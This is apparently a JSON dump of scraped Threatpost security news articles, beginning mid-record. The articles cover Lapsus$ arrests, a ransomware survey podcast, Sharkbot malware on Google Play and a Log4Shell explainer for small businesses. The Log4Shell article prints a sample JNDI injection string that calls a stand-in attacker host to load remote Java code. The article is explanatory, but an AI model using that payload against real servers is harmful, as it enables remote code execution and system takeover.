Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T17:14:57", "type": "threatpost", "title": "Cyberattackers Target UPS Back-Up Power Devices in Mission-Critical Environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T17:14:57", "id": "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "href": "https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T21:25:13", "description": "City of London Police have arrested seven people suspected of being connected to the Lapsus$ gang.\n\nThe bust came within hours of Bloomberg 
having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind.\n\nThe police haven\u2019t verified whether or not they nabbed the Oxford teen, per se.\n\nAt any rate, given that he\u2019s a minor, it would be illegal to identify him: According to security journalist [Brian Krebs](<https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/>), the teen is 17, though the [BBC](<https://www.bbc.com/news/technology-60864283>) pegs his age at 16.\n\nBut for what it\u2019s worth, all of the suspects are young. In a statement given to [TechCrunch](<https://techcrunch.com/2022/03/24/london-police-lapsus-arrests/>), the City of London Police said the seven are between 16 and 21: \u201cThe City of London Police has been conducting an investigation with its partners into members of a hacking group,\u201d according to Detective Inspector Michael O\u2019Sullivan. \u201cSeven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing.\u201d\n\nInvestigators reportedly told Bloomberg that another member of Lapsus$ is suspected to be a teenager residing in Brazil. 
There could well be more: Another investigator told the outlet that security researchers have identified seven unique accounts associated with Lapsus$, \u201cindicating that there are likely others involved in the group\u2019s operations.\u201d\n\n## Busy Beavers\n\nOver the past few months, Lapsus$ \u2013 a data extortion group \u2013 has targeted [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) and the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media kingpin Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nAllison Nixon, chief research officer at [Unit 221B](<https://www.unit221b.com/>), is one of the researchers who\u2019ve been tracking the Oxford teen, who, researchers say, goes by the online aliases \u201cWhite,\u201d \u201cBreachbase\u201d or \u201cOklaqq,\u201d among other names.\n\nShe\u2019s been working with researchers at security firm Palo Alto Networks to track individual members of LAPSUS$ even prior to the group\u2019s formation. 
Nixon told KrebsOnSecurity that she\u2019s convinced that the White/OklAGG individual is the head honcho, given that, among other things, the identity has been tied to the Lapsus$ group\u2019s recruiting message for company insiders to help them penetrate targeted organizations.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees.\n\nNixon told the BBC that researchers have had the Oxford teen\u2019s name since the middle of last year and that they\u2019d identified him even before he was doxed by a hacking forum \u2013 Doxbin, a site where people can post or sift through the personal data of hundreds of thousands of people for the purpose of doxing \u2013 that he\u2019d allegedly purchased and then run as a lousy, much-complained-about admin.\n\nHe wound up selling the forum back to its previous owner, at a loss, then leaked the entire Doxbin dataset, leading to the Doxbin community turning around and doxing him right back. That included what Krebs reported as \u201cvideos supposedly shot at night outside his home in the United Kingdom,\u201d along with his name, address, and social media pictures.\n\nThe Doxbin community also posted a curriculum vitae of his hacking career, the BBC reported \u2013 a career that made him filthy rich in short order. His Doxbin entry connected him to Lapsus$, as well. The entry reportedly reads:\n\n> \u201c[He] slowly began making money to further expand his exploit collection. \u2026 After a few years his net worth accumulated to well over 300BTC (close to $14 mil). 
\u2026 [He] now is affiliated with a wannabe ransomware group known as \u2018Lapsus$\u2019, who has been extorting & \u2018hacking\u2019 several organisations.\u201d \u2014Doxbin entry, per the BBC\n\nNixon told the BBC that Unit 221B, working with Palo Alto, identified the threat actor and then watched his exploits throughout 2021, \u201cperiodically sending law enforcement a heads-up about the latest crimes.\u201d\n\nShe said that researchers tracked him by \u201cwatching the post history of an account and seeing older posts provide contact information for the guy.\u201d The \u201cWhite\u201d individual also helped, she said, by failing to cover his tracks.\n\n## Get Off My Code, You Damn Kids\n\nAfter its breaches, Lapsus$ has posted stolen source code on the group\u2019s Telegram channel, including code stolen from Microsoft\u2019s Azure DevOps server for the company\u2019s Bing and Cortana products. Lapsus$ has also posted screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn February, the group also [stole](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>) two of Nvidia\u2019s code-signing certificates \u2013 certificates that were then used to sign malware, enabling malicious programs to slide past security safeguards on Windows machines.\n\nAfter its headline-grabbing attacks on Microsoft and Okta this past weekend, Lapsus$ announced on Tuesday that it was going to take a bit of a breather.\n\n\u201cA few of our members has a vacation until 30/3/2022. We might be quiet for some times,\u201d the hackers wrote in the group\u2019s Telegram channel. \u201cThanks for understand us. 
\u2013 we will try to leak stuff ASAP.\u201d\n\n## Why\u2019d You Do It?\n\nKen Westin, director of security strategy at Cybereason, said it\u2019s tough to guess at the motivation of the purported \u201cmastermind\u201d teen. \u201cMany had speculated it was an organized cybercrime syndicate or potential nation state actors,\u201d he told Threatpost in an email on Thursday.\n\nWhatever the teen\u2019s motivation \u2013 he\u2019s described as having autism, for whatever that\u2019s worth \u2013 Westin thinks the security community underestimates the younger generation. \u201cWe forget teens today have not only grown up with computers, but also have access to an unprecedented number of educational resources on programming and offensive security,\u201d he said.\n\n\u201cI speculated the group was young based on their modus operandi, or lack thereof, it was as if they were surprised by their success and were not sure what to do with it. In some of their follow up communications their language appeared more interested in the notoriety and [was] defensive of their capabilities and accomplishments than any financial motivation,\u201d he continued.\n\nOf course, when it comes to guessing what somebody\u2019s motivation might be for taking on the world\u2019s shiniest tech companies, et al., there\u2019s always that purported 300BTC income that Doxbin pointed to. Not too shabby a motivation, that, particularly when planted in the still-developing brain of a tot that\u2019s been put under glass during the pandemic.\n\n\u201cToday, teens have seen how much money is being made in criminal hacking, in some ways they are the new rockstars,\u201d Westin said. \u201cYou pair this with the fact kids have been cooped up for three years often with nothing but the internet to entertain themselves and we shouldn\u2019t be surprised we have skilled hackers. 
The problem is that their brains are still developing and the line between fun and crime can get blurred, where it\u2019s common for kids to hack to gain notoriety amongst their peers, but this easily crosses over into decisions that can affect the rest of their lives.\u201d\n\nIt\u2019s too early to say whether this will be the end of Lapsus$, he said. \u201cit could still be a false flag, bad attribution, or even framing someone for the hacks. If it is this 16-year-old in England, it is likely we will see an end to the group\u2019s activity, unless one of their partners in cybercrime takes up the mantle.\u201d\n\nWhether Lapsus$ boils down to a criminal gang or a teenager from Oxford, what matters is that the \u201corganization\u201d clearly has the ability to infiltrate some of the world\u2019s largest organizations at a speed that makes these attacks impossible to prevent using traditional perimeter defense tools, said Darren Williams, founder and CEO of privacy/security/prevention firm BlackFog.\n\nWe can\u2019t stick all teenagers in suspended animation until their brains are fully formed, but we can take note of how these groups/individuals stick it to targeted organizations. In an email to Threatpost on Thursday, Williams noted that more than 84 percent of all attacks involve data exfiltration, exposing data on the Dark Web and/or public web sites.\n\n\u201cBy refocusing security efforts on anti-data exfiltration, organizations are able to mitigate extortion attempts, regulatory fines, reports and ultimately the loss of trust in the business,\u201d Williams suggested.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T21:23:30", "type": "threatpost", "title": "UK Cops Collar 7 Suspected Lapsus$ Gang Members", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T21:23:30", "id": "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "href": "https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent 
[study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. 
What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. 
And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:20:58", "description": "Researchers have found the info-stealing Android malware Sharkbot lurking unsuspected in the depths of the Google Play store under the cover of anti-virus (AV) solutions.\n\nWhile analyzing suspicious applications on the store, the Check Point Research (CPR) team found what purported to be genuine AV solutions downloading and installing the malware, which steals credentials and banking info from Android devices but also has a range of other unique features.\n\n\u201cSharkbot lures victims to enter their 
credentials in windows that mimic benign credential input forms,\u201d CPR researchers Alex Shamsur and Raman Ladutska wrote in a [report](<https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/>) published Thursday. \u201cWhen the user enters credentials in these windows, the compromised data is sent to a malicious server.\u201d\n\nResearchers discovered six different applications\u2014including ones named Atom Clean-Booster, Antivirus; Antvirus Super Cleaner; and Center Security-Antivirus\u2014spreading Sharkbot. The apps came from three developer accounts\u2013Zbynek Adamcik, Adelmio Pagnotto and Bingo Like Inc.\u2014at least two of which were active in the autumn of last year. The timeline makes sense, as Sharkbot [first came onto researchers\u2019](<https://blog.malwarebytes.com/trojans/2021/11/sharkbot-android-banking-trojan-cleans-users-out/>) radar screens in November.\n\n\u201cSome of the applications linked to these accounts were removed from Google Play, but still exist in unofficial markets,\u201d researchers wrote. \u201cThis could mean that the actor behind the applications is trying to stay under the radar while still involved in malicious activity.\u201d\n\nGoogle removed the offending applications, but not before they were downloaded and installed about 15,000 times, researchers said. Primary targets of Sharkbot are users in the United Kingdom and Italy, as was previously the case, they said.\n\n## **Unique Aspects**\n\nCPR researchers peered under the hood of Sharkbot and uncovered not only typical info-stealing tactics, but also some characteristics that set it apart from typical Android malware, researchers said. It includes a geofencing feature that selects users based on geographic areas, ignoring users from China, India, Romania, Russia, Ukraine or Belarus, they said.\n\nSharkbot also boasts some clever techniques, researchers noted. 
\u201cIf the malware detects it is running in a sandbox, it stops the execution and quits,\u201d they wrote.\n\nAnother unique hallmark of the malware is that it makes use of a domain generation algorithm (DGA), an aspect rarely used in malware for the Android platform, researchers said.\n\n\u201cWith DGA, one sample with a hardcoded seed generates seven domains per week,\u201d they wrote. \u201cIncluding all the seeds and algorithms we have observed, there is a total of 56 domains per week, i.e., 8 different combinations of seed/algorithm.\u201d\n\nResearchers observed 27 versions of Sharkbot in their research; the main difference between versions was different DGA seeds as well as different botnetID and ownerID fields, they said.\n\nAll in all, Sharkbot implements 22 commands that allow various malicious actions to be executed on a user\u2019s Android device, including: requesting permission for sending SMS messages; uninstalling a given application; sending the device\u2019s contact list to a server; disabling battery optimization so Sharkbot can run in the background; and imitating the user\u2019s swipe over the screen.\n\n## **Timeline of Activity**\n\nResearchers first discovered four applications of the Sharkbot dropper on Google Play on Feb. 25 and shortly thereafter reported their findings to Google on March 3. Google removed the applications on March 9, but another Sharkbot dropper was discovered six days later, on March 15.\n\nCPR immediately reported the third dropper, then found two more Sharkbot droppers on March 22 and March 27, which it also reported quickly to Google for removal.\n\nThe droppers by which Sharkbot spreads should raise concern in and of themselves, researchers said. 
\u201cAs we can judge by the functionality of the droppers, their possibilities clearly pose a threat by themselves, beyond just dropping the malware,\u201d they wrote in the report.\n\nSpecifically, researchers found the Sharkbot dropper masquerading as the following applications (listed by package name) on Google Play:\n\n * com.abbondioendrizzi.tools[.]supercleaner\n * com.abbondioendrizzi.antivirus.supercleaner\n * com.pagnotto28.sellsourcecode.alpha\n * com.pagnotto28.sellsourcecode.supercleaner\n * com.antivirus.centersecurity.freeforall\n * com.centersecurity.android.cleaner\n\nThe droppers also have a few of their own evasion tactics, such as detecting emulators and quitting if one is found, researchers noted. They are also able to inspect and act on all the UI events of the device as well as replace notifications sent by other applications.\n\n\u201cIn addition, they can install an APK downloaded from the CnC, which provides a convenient starting point to spread the malware as soon as the user installs such an application on the device,\u201d researchers added.\n\n## **Google Play Under Fire**\n\nGoogle has [long struggled](<https://threatpost.com/google-play-malware-spy-trojans/164601/>) with the persistence of malicious applications and [malware](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>) on its Android app store and has made significant efforts to clean up its act.\n\nHowever, the emergence of Sharkbot disguised as AV solutions shows that attackers are getting sneakier in how they hide their malicious activity on the platform, and could serve to damage users\u2019 confidence in Google Play, noted a security professional.\n\n\u201cMalware apps that conceal their malicious functionality with time delays, code obfuscation and geofencing can be challenging to detect during the app review process, but the regularity with which they are discovered lurking in official app stores really damages user trust in the safety of all apps on the platform,\u201d observed 
Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost.\n\nWith the smartphone at the center of people\u2019s digital lives and acting as a hub of financial, personal and work activity, \u201cany malware that compromises the security of such a central device can do significant financial or reputational damage,\u201d he added.\n\nAnother security professional urged Android users to be cautious when deciding whether or not to download a mobile app from a reputable vendor\u2019s store, even if it\u2019s a trusted brand.\n\n\u201cWhen installing apps from various technology stores, it is best to research the app before downloading it,\u201d observed James McQuiggan, security awareness advocate at [KnowBe4](<http://www.knowbe4.com/>). \u201cCybercriminals love to trick users into installing malicious apps with hidden functionalities in an attempt to steal data or take over accounts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-08T16:06:29", "type": "threatpost", "title": "Google Play Bitten by Sharkbot Info-stealer \u2018AV Solution\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T16:06:29", "id": "THREATPOST:48A631F2D45804C677BB672F838F29DA", "href": "https://threatpost.com/google-play-bitten-sharkbot/179252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. 
And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpost)._\n\n_**Questions answered:**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the Apache log4j 2 library to log data. Because that library is near-ubiquitous in Java applications, any business that runs or depends on Java-based services, including many websites, is likely to be affected. With a single crafted string that ends up in a log message, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. 
However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. 
Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. 
After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping on every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real-world attack can be as simple as the attacker sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in [this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications; this triggers the vulnerability. 
The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 